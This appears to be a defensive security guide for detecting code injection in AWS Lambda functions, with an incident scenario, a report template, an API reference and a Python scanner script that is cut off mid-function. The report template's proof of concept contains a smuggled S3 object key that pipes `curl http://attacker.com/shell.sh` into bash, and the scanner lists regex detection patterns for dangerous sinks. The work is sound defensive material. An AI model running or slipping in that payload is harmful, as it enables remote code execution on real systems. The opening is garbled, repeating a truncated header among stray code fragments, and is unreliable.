Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

),\n 'email': re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

),\n 'action': re.compile(r'^(get|list|create|update|delete)

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

),\n }\n\n def validate_event(schema):\n \"\"\"Decorator that validates Lambda event against a whitelist schema.\"\"\"\n def decorator(func):\n @wraps(func)\n def wrapper(event, context):\n for field, pattern in schema.items():\n value = event.get(field, '')\n if isinstance(value, str) and not pattern.match(value):\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error': f'Invalid {field}'})\n }\n return func(event, context)\n return wrapper\n return decorator\n\n @validate_event(SAFE_PATTERNS)\n def handler(event, context):\n # Event data is validated before reaching this point\n user_id = event['userId']\n # Safe to use in queries with parameterized statements\n return {'statusCode': 200, 'body': json.dumps({'user': user_id})}\n ```\n\n- **Lambda function URL authorization**: Ensure functions exposed via URLs require IAM auth:\n ```bash\n aws lambda get-function-url-config --function-name \u003cname> \\\n --query 'AuthType' --output text\n # Must return \"AWS_IAM\", not \"NONE\"\n ```\n\n- **Least privilege execution roles**: Restrict the function's IAM role to the minimum required permissions:\n ```json\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"dynamodb:GetItem\",\n \"dynamodb:PutItem\"\n ],\n \"Resource\": \"arn:aws:dynamodb:us-east-1:111122223333:table/UserTable\"\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": \"logs:*\",\n \"Resource\": \"arn:aws:logs:us-east-1:111122223333:log-group:/aws/lambda/my-function:*\"\n }\n ]\n }\n ```\n\n- **SCP to prevent dangerous Lambda modifications**: Apply a Service Control Policy at the organization level to restrict who can modify Lambda functions and pass roles:\n ```json\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"DenyLambdaCodeUpdateExceptCICD\",\n \"Effect\": \"Deny\",\n \"Action\": [\n \"lambda:UpdateFunctionCode\",\n \"lambda:UpdateFunctionConfiguration\"\n ],\n \"Resource\": \"*\",\n \"Condition\": {\n \"StringNotLike\": {\n \"aws:PrincipalArn\": \"arn:aws:iam::*:role/CICD-DeploymentRole\"\n }\n }\n }\n ]\n }\n ```\n\n- **AWS Lambda Powertools for structured logging**: Emit structured security events that can be ingested by SIEM:\n ```python\n from aws_lambda_powertools import Logger, Tracer\n from aws_lambda_powertools.utilities.validation import validate\n\n logger = Logger(service=\"payment-processor\")\n tracer = Tracer()\n\n @logger.inject_lambda_context\n @tracer.capture_lambda_handler\n def handler(event, context):\n logger.info(\"Processing event\", extra={\n \"source_ip\": event.get('requestContext', {}).get('identity', {}).get('sourceIp'),\n \"user_agent\": event.get('headers', {}).get('User-Agent'),\n \"http_method\": event.get('httpMethod'),\n })\n ```\n\n## Key Concepts\n\n| Term | Definition |\n|------|------------|\n| **Event Source Poisoning** | An attack where malicious data is injected into a serverless event source (S3, SQS, DynamoDB Stream, API Gateway) to trigger code execution or injection when the function processes the event |\n| **Function Injection** | Exploitation of unsanitized event data that flows into dangerous runtime functions (eval, exec, os.system, child_process.exec) within a serverless function handler |\n| **Lambda Layer Hijacking** | An attack where a malicious Lambda layer is attached to a function to intercept execution, override dependencies, or exfiltrate data by placing code in the runtime's module search path |\n| **IAM Privilege Escalation via Lambda** | A technique where an attacker with UpdateFunctionCode and PassRole permissions modifies a function to execute with a higher-privilege IAM role, extracting temporary credentials |\n| **OWASP Serverless Top 10** | A security framework identifying the ten most critical risks in serverless architectures, including injection (SAS-1), broken authentication (SAS-2), and over-privileged functions (SAS-6) |\n| **Cold Start Injection** | An attack that targets the function initialization phase where environment variables, layer code, and extensions execute before the handler, potentially in an unmonitored context |\n| **Execution Role** | The IAM role assumed by a Lambda function during execution, providing temporary credentials that define the function's AWS API access permissions |\n\n## Tools & Systems\n\n- **Semgrep**: Static analysis tool with serverless-specific rule packs that detect event data flowing into injection sinks across Python, Node.js, Java, and Go Lambda runtimes\n- **Bandit**: Python-specific SAST tool that identifies security issues including use of eval, exec, subprocess with shell=True, and pickle deserialization\n- **AWS CloudTrail**: Logs Lambda management events (UpdateFunctionCode, CreateFunction) and data events (Invoke) for detecting unauthorized modifications and anomalous invocation patterns\n- **CloudWatch Logs Insights**: Query engine for searching Lambda execution logs for injection attempt indicators, runtime errors, and suspicious command patterns\n- **AWS Config**: Evaluates Lambda function configurations against compliance rules including layer inventory, execution role permissions, and function URL authorization types\n- **Prowler**: Open-source AWS security assessment tool with Lambda-specific checks for public access, overprivileged roles, and missing encryption\n\n## Common Scenarios\n\n### Scenario: Detecting and Responding to a Lambda-Based Privilege Escalation Attack\n\n**Context**: A SOC analyst receives a GuardDuty alert for `UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS` on an IAM role used by multiple Lambda functions. Investigation reveals that an attacker compromised a developer's AWS credentials with `lambda:UpdateFunctionCode` permissions and modified a payment processing function to exfiltrate the execution role's temporary credentials.\n\n**Approach**:\n1. Query CloudTrail for `UpdateFunctionCode` events in the past 7 days to identify when the function was modified and by which principal:\n ```\n fields eventTime, userIdentity.arn, requestParameters.functionName, sourceIPAddress\n | filter eventName = \"UpdateFunctionCode20150331v2\"\n | filter requestParameters.functionName = \"payment-processor\"\n | sort eventTime desc\n ```\n2. Discover that the function was modified from an IP address in an unexpected geographic location at 02:47 UTC, outside of normal deployment windows\n3. Download the modified function code and find an injected snippet that POSTs `os.environ['AWS_ACCESS_KEY_ID']`, `AWS_SECRET_ACCESS_KEY`, and `AWS_SESSION_TOKEN` to an external endpoint on each invocation\n4. Check if the attacker also added a malicious layer by querying for `UpdateFunctionConfiguration` events with layer changes\n5. Verify the function's execution role permissions: the payment-processor role has `dynamodb:*`, `s3:GetObject`, `s3:PutObject`, and `sqs:SendMessage` across all resources, exceeding least privilege\n6. Search CloudTrail for API calls made by the exfiltrated credentials from outside AWS, finding `sts:GetCallerIdentity`, `s3:ListBuckets`, `dynamodb:Scan` on the customer table, and `iam:CreateUser` attempts\n7. Respond by reverting the function code from the last known-good deployment package in the CI/CD artifact store, rotating the execution role's session tokens, and adding an SCP that restricts `lambda:UpdateFunctionCode` to the CI/CD role only\n\n**Pitfalls**:\n- Only checking the function code and missing malicious layers that persist even after the function code is reverted\n- Not searching for lateral movement from the exfiltrated credentials to other AWS services, missing data exfiltration from DynamoDB or S3\n- Failing to check if the attacker created new IAM users, access keys, or roles during the window the credentials were valid\n- Restoring the function without first preserving the malicious code as forensic evidence\n- Not implementing preventive controls (SCP, EventBridge alerting) after remediation, leaving the same attack path open\n\n## Output Format\n\n```\n## Serverless Function Injection Assessment\n\n**Account**: 111122223333\n**Region**: us-east-1\n**Functions Analyzed**: 47\n**Event Source Mappings**: 23\n**Assessment Date**: 2026-03-19\n\n### Critical Findings\n\n#### FINDING-001: OS Command Injection in S3 Event Handler\n**Function**: image-resize-processor\n**Runtime**: python3.12\n**Severity**: Critical (CVSS 9.8)\n**Sink**: os.system() at handler.py:34\n**Source**: event['Records'][0]['s3']['object']['key']\n**Attack Vector**: Upload S3 object with key containing shell metacharacters\n**Proof of Concept**:\n Object key: `; curl http://attacker.com/shell.sh | bash`\n Results in: os.system(\"convert /tmp/; curl http://attacker.com/shell.sh | bash\")\n**Remediation**: Replace os.system() with subprocess.run() with shell=False\n and validate the S3 key against an allowlist pattern.\n\n#### FINDING-002: IAM Privilege Escalation Path\n**Function**: data-export-worker\n**Execution Role**: arn:aws:iam::111122223333:role/DataExportRole\n**Role Permissions**: s3:*, dynamodb:*, iam:PassRole, lambda:*\n**Risk**: Any user with lambda:UpdateFunctionCode can modify this function\n to execute arbitrary AWS API calls with AdministratorAccess-equivalent permissions.\n**Remediation**: Apply least privilege to the execution role, restrict\n lambda:UpdateFunctionCode via SCP to CI/CD pipeline role only.\n\n#### FINDING-003: Unauthorized Layer Attached\n**Function**: auth-token-validator\n**Layer**: arn:aws:lambda:us-east-1:999888777666:layer:utility-lib:3\n**Layer Account**: External account (999888777666)\n**Risk**: Layer from untrusted external account can intercept all function\n invocations, modify responses, or exfiltrate environment variables.\n**Remediation**: Remove the external layer, vendor the dependency into the\n function's deployment package, add AWS Config rule to block external layers.\n\n### Detection Rules Deployed\n- EventBridge rule: Alert on UpdateFunctionCode from non-CI/CD principals\n- CloudWatch alarm: Function error rate spike > 3x baseline in 5 minutes\n- Config rule: Lambda functions must not have layers from external accounts\n- Config rule: Lambda execution roles must not have wildcard resource permissions\n```\n---","attachment_filenames":["references/api-reference.md","scripts/agent.py"],"attachments":[{"filename":"references/api-reference.md","content":"# API Reference: Serverless Function Injection Detection Agent\n\n## Overview\n\nDetects code injection vulnerabilities in AWS Lambda functions by scanning function code for dangerous sinks (eval, exec, os.system, child_process.exec), auditing Lambda layers for external account dependencies, identifying IAM privilege escalation paths through overprivileged execution roles, and monitoring CloudTrail for suspicious function modifications. For authorized security assessments only.\n\n## Dependencies\n\n| Package | Version | Purpose |\n|---------|---------|---------|\n| boto3 | >=1.26 | AWS API access for Lambda, IAM, CloudTrail |\n\n## CLI Usage\n\n```bash\n# Full assessment with code scanning\npython agent.py --region us-east-1 --scan-code --cloudtrail-days 14 --output report.json\n\n# Scan specific functions only\npython agent.py --functions payment-processor auth-handler --scan-code --output report.json\n\n# Quick assessment without code download (IAM, layers, CloudTrail only)\npython agent.py --region us-west-2 --output quick_report.json\n```\n\n## Arguments\n\n| Argument | Required | Description |\n|----------|----------|-------------|\n| `--region` | No | AWS region to assess (default: us-east-1) |\n| `--functions` | No | Specific function names to scan (default: all functions in region) |\n| `--scan-code` | No | Download and scan function deployment packages for injection sinks |\n| `--cloudtrail-days` | No | Number of days of CloudTrail history to search (default: 7) |\n| `--output` | No | Output file path (default: `serverless_injection_report.json`) |\n\n## Key Functions\n\n### `enumerate_functions(lambda_client)`\nLists all Lambda functions with runtime, handler, execution role, layers, environment variable names, and function URL configuration. Flags functions with secrets in environment variables.\n\n### `get_event_source_mappings(lambda_client)`\nEnumerates all event source mappings (SQS, DynamoDB Streams, Kinesis, Kafka, MQ) to identify injection entry points where untrusted data enters function handlers.\n\n### `download_and_scan_function(lambda_client, function_name, runtime_family, work_dir)`\nDownloads the function deployment package, extracts it, and scans source files for injection sinks using regex patterns. Checks whether event data accessors (`event[`, `event.get(`) appear in the context around each sink to assess data flow confidence.\n\n### `audit_layers(lambda_client, functions)`\nIdentifies Lambda layers from external AWS accounts and high-impact layers shared across 5+ functions. External layers can intercept function execution or override runtime dependencies.\n\n### `detect_privilege_escalation_paths(iam_client, functions)`\nAudits execution roles for dangerous permissions (iam:PassRole, lambda:UpdateFunctionCode, sts:AssumeRole) and administrative policies. Any function with UpdateFunctionCode + PassRole is a privilege escalation vector.\n\n### `check_cloudtrail_for_modifications(cloudtrail_client, days_back)`\nSearches CloudTrail for UpdateFunctionCode, UpdateFunctionConfiguration, PublishLayerVersion, and CreateFunction events. Flags modifications outside CloudFormation/console, role changes, layer additions, and off-hours activity.\n\n### `check_function_url_security(lambda_client, functions)`\nIdentifies Lambda function URLs with `AuthType=NONE` that are publicly accessible without authentication.\n\n## Injection Pattern Coverage\n\n### Python Sinks\n| Pattern | CWE | Severity |\n|---------|-----|----------|\n| `eval()` | CWE-95 | Critical |\n| `exec()` | CWE-95 | Critical |\n| `os.system()` | CWE-78 | Critical |\n| `os.popen()` | CWE-78 | Critical |\n| `subprocess.*(shell=True)` | CWE-78 | Critical |\n| `pickle.loads()` | CWE-502 | High |\n| `yaml.load()` without SafeLoader | CWE-502 | High |\n| `jinja2.Template()` with event data | CWE-1336 | High |\n| SQL via f-string with event data | CWE-89 | Critical |\n\n### Node.js Sinks\n| Pattern | CWE | Severity |\n|---------|-----|----------|\n| `eval()` | CWE-95 | Critical |\n| `new Function()` | CWE-95 | Critical |\n| `child_process.exec()` | CWE-78 | Critical |\n| `child_process.execSync()` | CWE-78 | Critical |\n| `vm.runInNewContext()` | CWE-95 | Critical |\n| `vm.runInThisContext()` | CWE-95 | Critical |\n| Template literal command injection | CWE-78 | Critical |\n\n## Output Schema\n\n```json\n{\n \"report_type\": \"Serverless Function Injection Assessment\",\n \"generated_at\": \"ISO-8601 timestamp\",\n \"summary\": {\n \"functions_analyzed\": 0,\n \"event_source_mappings\": 0,\n \"total_findings\": 0,\n \"critical_findings\": 0,\n \"high_findings\": 0,\n \"injection_sinks_found\": 0,\n \"layer_issues\": 0,\n \"escalation_paths\": 0,\n \"suspicious_modifications\": 0\n },\n \"findings\": [\n {\n \"category\": \"code_injection|layer_security|privilege_escalation|suspicious_modification|function_url\",\n \"function_name\": \"\",\n \"severity\": \"critical|high|medium\",\n \"description\": \"\"\n }\n ],\n \"functions\": [],\n \"event_source_mappings\": [],\n \"cloudtrail_events\": []\n}\n```\n\n## Exit Codes\n\n| Code | Meaning |\n|------|---------|\n| 0 | No critical findings |\n| 1 | Critical injection sinks or privilege escalation paths detected |\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":5121,"content_sha256":"9c39fe985ee752ce9ba78520c9b25a0e70859270e4f2ef35558696cf95f1ab21"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n# For authorized security assessments and defensive monitoring only\n\"\"\"Serverless Function Injection Detection Agent - Scans Lambda functions for injection vulnerabilities, layer hijacking, and IAM escalation paths.\"\"\"\n\nimport argparse\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport zipfile\nfrom datetime import datetime, timedelta, timezone\n\ntry:\n import boto3\n from botocore.exceptions import ClientError\nexcept ImportError:\n print(\"ERROR: boto3 required. Install with: pip install boto3\")\n sys.exit(1)\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)s [%(levelname)s] %(message)s\")\nlogger = logging.getLogger(__name__)\n\n# Dangerous function patterns by runtime\nINJECTION_PATTERNS = {\n \"python\": [\n {\"pattern\": r\"\\beval\\s*\\(\", \"sink\": \"eval()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\bexec\\s*\\(\", \"sink\": \"exec()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\bos\\.system\\s*\\(\", \"sink\": \"os.system()\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bos\\.popen\\s*\\(\", \"sink\": \"os.popen()\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bsubprocess\\.call\\s*\\(.*shell\\s*=\\s*True\", \"sink\": \"subprocess.call(shell=True)\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bsubprocess\\.run\\s*\\(.*shell\\s*=\\s*True\", \"sink\": \"subprocess.run(shell=True)\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bsubprocess\\.Popen\\s*\\(.*shell\\s*=\\s*True\", \"sink\": \"subprocess.Popen(shell=True)\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bpickle\\.loads\\s*\\(\", \"sink\": \"pickle.loads()\", \"severity\": \"high\", \"cwe\": \"CWE-502\"},\n {\"pattern\": r\"\\byaml\\.load\\s*\\((?!.*Loader\\s*=\\s*yaml\\.SafeLoader)\", \"sink\": \"yaml.load() without SafeLoader\", \"severity\": \"high\", \"cwe\": \"CWE-502\"},\n {\"pattern\": r\"\\bjinja2\\.Template\\s*\\(.*event\", \"sink\": \"jinja2.Template() with event data\", \"severity\": \"high\", \"cwe\": \"CWE-1336\"},\n {\"pattern\": r\"\\b__import__\\s*\\(\", \"sink\": \"__import__()\", \"severity\": \"high\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"f['\\\"].*\\{.*event.*\\}.*['\\\"].*\\.execute\\(\", \"sink\": \"SQL via f-string with event data\", \"severity\": \"critical\", \"cwe\": \"CWE-89\"},\n {\"pattern\": r\"['\\\"].*%s.*['\\\"].*%.*event\", \"sink\": \"SQL via string formatting with event data\", \"severity\": \"critical\", \"cwe\": \"CWE-89\"},\n ],\n \"nodejs\": [\n {\"pattern\": r\"\\beval\\s*\\(\", \"sink\": \"eval()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\bnew\\s+Function\\s*\\(\", \"sink\": \"new Function()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\bchild_process\\.exec\\s*\\(\", \"sink\": \"child_process.exec()\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bchild_process\\.execSync\\s*\\(\", \"sink\": \"child_process.execSync()\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bexecSync\\s*\\(\", \"sink\": \"execSync()\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bexec\\s*\\((?!ute)\", \"sink\": \"exec()\", \"severity\": \"high\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"\\bvm\\.runInNewContext\\s*\\(\", \"sink\": \"vm.runInNewContext()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\bvm\\.runInThisContext\\s*\\(\", \"sink\": \"vm.runInThisContext()\", \"severity\": \"critical\", \"cwe\": \"CWE-95\"},\n {\"pattern\": r\"\\brequire\\s*\\(\\s*['\\\"]child_process['\\\"]\\s*\\)\", \"sink\": \"require('child_process')\", \"severity\": \"medium\", \"cwe\": \"CWE-78\"},\n {\"pattern\": r\"`.*\\$\\{.*event.*\\}`.*exec\", \"sink\": \"Template literal command injection\", \"severity\": \"critical\", \"cwe\": \"CWE-78\"},\n ],\n}\n\nEVENT_DATA_ACCESSORS = [\n r\"event\\s*\\[\",\n r\"event\\s*\\.\",\n r\"event\\.get\\s*\\(\",\n r\"event\\[.Records.\\]\",\n r\"event\\.body\",\n r\"event\\.headers\",\n r\"event\\.queryStringParameters\",\n r\"event\\.pathParameters\",\n r\"event\\.requestContext\",\n]\n\n\ndef detect_runtime_family(runtime):\n \"\"\"Map Lambda runtime to language family.\"\"\"\n if not runtime:\n return \"unknown\"\n runtime_lower = runtime.lower()\n if \"python\" in runtime_lower:\n return \"python\"\n if \"node\" in runtime_lower:\n return \"nodejs\"\n if \"java\" in runtime_lower:\n return \"java\"\n if \"go\" in runtime_lower:\n return \"go\"\n if \"ruby\" in runtime_lower:\n return \"ruby\"\n if \"dotnet\" in runtime_lower:\n return \"dotnet\"\n return \"unknown\"\n\n\ndef enumerate_functions(lambda_client):\n \"\"\"Enumerate all Lambda functions with their configurations.\"\"\"\n functions = []\n paginator = lambda_client.get_paginator(\"list_functions\")\n for page in paginator.paginate():\n for func in page[\"Functions\"]:\n func_info = {\n \"function_name\": func[\"FunctionName\"],\n \"function_arn\": func[\"FunctionArn\"],\n \"runtime\": func.get(\"Runtime\", \"container\"),\n \"runtime_family\": detect_runtime_family(func.get(\"Runtime\")),\n \"handler\": func.get(\"Handler\"),\n \"role\": func[\"Role\"],\n \"memory_size\": func.get(\"MemorySize\"),\n \"timeout\": func.get(\"Timeout\"),\n \"last_modified\": func.get(\"LastModified\"),\n \"layers\": [l[\"Arn\"] for l in func.get(\"Layers\", [])],\n \"environment_variables\": list(func.get(\"Environment\", {}).get(\"Variables\", {}).keys()),\n \"has_function_url\": False,\n \"has_secrets_in_env\": False,\n }\n\n # Check for secrets in environment variable names\n secret_patterns = [\"KEY\", \"SECRET\", \"PASSWORD\", \"TOKEN\", \"CREDENTIAL\", \"API_KEY\", \"PRIVATE\"]\n for var_name in func_info[\"environment_variables\"]:\n if any(pat in var_name.upper() for pat in secret_patterns):\n func_info[\"has_secrets_in_env\"] = True\n break\n\n # Check for function URL\n try:\n url_config = lambda_client.get_function_url_config(FunctionName=func[\"FunctionName\"])\n func_info[\"has_function_url\"] = True\n func_info[\"function_url_auth\"] = url_config.get(\"AuthType\", \"UNKNOWN\")\n except ClientError:\n pass\n\n functions.append(func_info)\n\n logger.info(\"Enumerated %d Lambda functions\", len(functions))\n return functions\n\n\ndef get_event_source_mappings(lambda_client):\n \"\"\"Get all event source mappings to identify injection entry points.\"\"\"\n mappings = []\n paginator = lambda_client.get_paginator(\"list_event_source_mappings\")\n for page in paginator.paginate():\n for mapping in page[\"EventSourceMappings\"]:\n source_arn = mapping.get(\"EventSourceArn\", \"\")\n source_type = \"unknown\"\n if \":sqs:\" in source_arn:\n source_type = \"SQS\"\n elif \":dynamodb:\" in source_arn:\n source_type = \"DynamoDB Stream\"\n elif \":kinesis:\" in source_arn:\n source_type = \"Kinesis Stream\"\n elif \":kafka\" in source_arn:\n source_type = \"Kafka\"\n elif \":mq:\" in source_arn:\n source_type = \"MQ\"\n\n mappings.append({\n \"function_arn\": mapping.get(\"FunctionArn\"),\n \"event_source_arn\": source_arn,\n \"source_type\": source_type,\n \"state\": mapping.get(\"State\"),\n \"batch_size\": mapping.get(\"BatchSize\"),\n })\n\n logger.info(\"Found %d event source mappings\", len(mappings))\n return mappings\n\n\ndef download_and_scan_function(lambda_client, function_name, runtime_family, work_dir):\n \"\"\"Download function code and scan for injection patterns.\"\"\"\n findings = []\n try:\n response = lambda_client.get_function(FunctionName=function_name)\n code_location = response[\"Code\"][\"Location\"]\n\n import urllib.request\n zip_path = os.path.join(work_dir, f\"{function_name}.zip\")\n req = urllib.request.Request(code_location)\n with urllib.request.urlopen(req, timeout=60) as resp, open(zip_path, \"wb\") as out:\n out.write(resp.read())\n\n extract_dir = os.path.join(work_dir, function_name)\n os.makedirs(extract_dir, exist_ok=True)\n\n with zipfile.ZipFile(zip_path, \"r\") as zf:\n zf.extractall(extract_dir)\n\n # Determine file extensions to scan\n extensions = {\n \"python\": [\".py\"],\n \"nodejs\": [\".js\", \".mjs\", \".ts\"],\n \"java\": [\".java\"],\n \"go\": [\".go\"],\n \"ruby\": [\".rb\"],\n }\n target_exts = extensions.get(runtime_family, [\".py\", \".js\"])\n\n patterns = INJECTION_PATTERNS.get(runtime_family, [])\n\n for root, dirs, files in os.walk(extract_dir):\n # Skip node_modules and vendor directories\n dirs[:] = [d for d in dirs if d not in (\"node_modules\", \"vendor\", \"__pycache__\", \".git\")]\n\n for filename in files:\n if not any(filename.endswith(ext) for ext in target_exts):\n continue\n\n filepath = os.path.join(root, filename)\n relative_path = os.path.relpath(filepath, extract_dir)\n\n try:\n with open(filepath, \"r\", encoding=\"utf-8\", errors=\"ignore\") as f:\n lines = f.readlines()\n except Exception:\n continue\n\n for line_num, line in enumerate(lines, 1):\n for pattern_info in patterns:\n if re.search(pattern_info[\"pattern\"], line):\n # Check if event data flows into this sink\n context_start = max(0, line_num - 10)\n context_lines = lines[context_start:line_num]\n context_text = \"\".join(context_lines)\n\n event_data_involved = any(\n re.search(accessor, context_text)\n for accessor in EVENT_DATA_ACCESSORS\n )\n\n findings.append({\n \"function_name\": function_name,\n \"file\": relative_path,\n \"line\": line_num,\n \"code\": line.strip()[:200],\n \"sink\": pattern_info[\"sink\"],\n \"severity\": pattern_info[\"severity\"],\n \"cwe\": pattern_info[\"cwe\"],\n \"event_data_flow\": event_data_involved,\n \"confidence\": \"high\" if event_data_involved else \"medium\",\n })\n\n except ClientError as e:\n logger.warning(\"Cannot download %s: %s\", function_name, e)\n except Exception as e:\n logger.warning(\"Error scanning %s: %s\", function_name, e)\n\n return findings\n\n\ndef audit_layers(lambda_client, functions):\n \"\"\"Audit Lambda layers for security issues.\"\"\"\n findings = []\n layer_accounts = {}\n account_id = None\n\n for func in functions:\n for layer_arn in func.get(\"layers\", []):\n # Extract account ID from layer ARN\n parts = layer_arn.split(\":\")\n if len(parts) >= 5:\n layer_account = parts[4]\n if account_id is None:\n # Get our own account ID from function ARN\n func_parts = func[\"function_arn\"].split(\":\")\n if len(func_parts) >= 5:\n account_id = func_parts[4]\n\n if layer_account != account_id and account_id:\n findings.append({\n \"type\": \"external_layer\",\n \"function_name\": func[\"function_name\"],\n \"layer_arn\": layer_arn,\n \"layer_account\": layer_account,\n \"severity\": \"high\",\n \"description\": f\"Function uses layer from external account {layer_account}\",\n })\n\n layer_accounts.setdefault(layer_arn, []).append(func[\"function_name\"])\n\n # Check for layers used by many functions (high-impact if compromised)\n for layer_arn, func_names in layer_accounts.items():\n if len(func_names) >= 5:\n findings.append({\n \"type\": \"high_impact_layer\",\n \"layer_arn\": layer_arn,\n \"affected_functions\": func_names,\n \"severity\": \"medium\",\n \"description\": f\"Layer is shared across {len(func_names)} functions - compromise would be high impact\",\n })\n\n return findings\n\n\ndef detect_privilege_escalation_paths(iam_client, functions):\n \"\"\"Identify Lambda functions with overprivileged execution roles.\"\"\"\n findings = []\n checked_roles = {}\n\n dangerous_actions = [\n \"iam:PassRole\", \"iam:CreateUser\", \"iam:CreateRole\", \"iam:AttachRolePolicy\",\n \"iam:AttachUserPolicy\", \"iam:PutRolePolicy\", \"iam:PutUserPolicy\",\n \"iam:CreateAccessKey\", \"iam:UpdateAssumeRolePolicy\",\n \"lambda:UpdateFunctionCode\", \"lambda:UpdateFunctionConfiguration\",\n \"lambda:CreateFunction\", \"lambda:InvokeFunction\",\n \"sts:AssumeRole\",\n ]\n\n for func in functions:\n role_arn = func[\"role\"]\n role_name = role_arn.split(\"/\")[-1]\n\n if role_name in checked_roles:\n role_findings = checked_roles[role_name]\n else:\n role_findings = {\"dangerous_permissions\": [], \"has_wildcard_resource\": False, \"has_admin\": False}\n\n try:\n # Check attached policies\n attached = iam_client.list_attached_role_policies(RoleName=role_name)\n for policy in attached[\"AttachedPolicies\"]:\n if policy[\"PolicyName\"] in (\"AdministratorAccess\", \"PowerUserAccess\"):\n role_findings[\"has_admin\"] = True\n\n try:\n policy_info = iam_client.get_policy(PolicyArn=policy[\"PolicyArn\"])\n version_id = policy_info[\"Policy\"][\"DefaultVersionId\"]\n policy_doc = iam_client.get_policy_version(\n PolicyArn=policy[\"PolicyArn\"], VersionId=version_id\n )\n for stmt in policy_doc[\"PolicyVersion\"][\"Document\"].get(\"Statement\", []):\n if stmt.get(\"Effect\") != \"Allow\":\n continue\n actions = stmt.get(\"Action\", [])\n if isinstance(actions, str):\n actions = [actions]\n resources = stmt.get(\"Resource\", [])\n if isinstance(resources, str):\n resources = [resources]\n\n if \"*\" in actions:\n role_findings[\"has_admin\"] = True\n if \"*\" in resources:\n role_findings[\"has_wildcard_resource\"] = True\n\n for action in actions:\n if action in dangerous_actions or action == \"*\":\n role_findings[\"dangerous_permissions\"].append(action)\n except ClientError:\n continue\n\n # Check inline policies\n inline = iam_client.list_role_policies(RoleName=role_name)\n for policy_name in inline[\"PolicyNames\"]:\n try:\n policy_doc = iam_client.get_role_policy(\n RoleName=role_name, PolicyName=policy_name\n )\n for stmt in policy_doc[\"PolicyDocument\"].get(\"Statement\", []):\n if stmt.get(\"Effect\") != \"Allow\":\n continue\n actions = stmt.get(\"Action\", [])\n if isinstance(actions, str):\n actions = [actions]\n for action in actions:\n if action in dangerous_actions or action == \"*\":\n role_findings[\"dangerous_permissions\"].append(action)\n except ClientError:\n continue\n\n except ClientError as e:\n logger.warning(\"Cannot audit role %s: %s\", role_name, e)\n\n checked_roles[role_name] = role_findings\n\n if role_findings[\"has_admin\"]:\n findings.append({\n \"type\": \"admin_execution_role\",\n \"function_name\": func[\"function_name\"],\n \"role\": role_name,\n \"severity\": \"critical\",\n \"description\": \"Function has administrative execution role - any code modification grants full account access\",\n })\n elif role_findings[\"dangerous_permissions\"]:\n findings.append({\n \"type\": \"dangerous_permissions\",\n \"function_name\": func[\"function_name\"],\n \"role\": role_name,\n \"permissions\": list(set(role_findings[\"dangerous_permissions\"])),\n \"severity\": \"high\",\n \"description\": f\"Execution role has dangerous permissions: {', '.join(set(role_findings['dangerous_permissions']))}\",\n })\n\n return findings\n\n\ndef check_cloudtrail_for_modifications(cloudtrail_client, days_back=7):\n \"\"\"Search CloudTrail for suspicious Lambda modifications.\"\"\"\n findings = []\n end_time = datetime.now(timezone.utc)\n start_time = end_time - timedelta(days=days_back)\n\n suspicious_events = [\n \"UpdateFunctionCode20150331v2\",\n \"UpdateFunctionConfiguration20150331v2\",\n \"PublishLayerVersion20181031\",\n \"AddLayerVersionPermission20181031\",\n \"CreateFunction20150331\",\n ]\n\n for event_name in suspicious_events:\n try:\n response = cloudtrail_client.lookup_events(\n LookupAttributes=[\n {\"AttributeKey\": \"EventName\", \"AttributeValue\": event_name}\n ],\n StartTime=start_time,\n EndTime=end_time,\n MaxResults=50,\n )\n for event in response.get(\"Events\", []):\n ct_event = json.loads(event.get(\"CloudTrailEvent\", \"{}\"))\n 